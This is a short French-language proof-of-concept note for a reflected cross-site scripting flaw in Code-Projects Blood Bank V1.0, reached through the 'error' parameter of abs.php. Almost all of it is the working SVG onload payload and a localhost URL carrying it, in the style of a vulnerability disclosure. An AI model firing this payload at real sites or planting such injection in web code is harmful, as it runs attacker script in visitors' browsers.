
Preuve de concept pour une vulnérabilité de cross-site scripting réfléchi (XSS) dans Code-Projects Blood Bank V1.0 via le paramètre 'error' dans abs.php, avec un payload fonctionnel et une référence CVE.
"><svg/onload=alert(document.domain)>http://localhost/bloodbank/abs.php?error="><svg/onload=alert(document.domain)>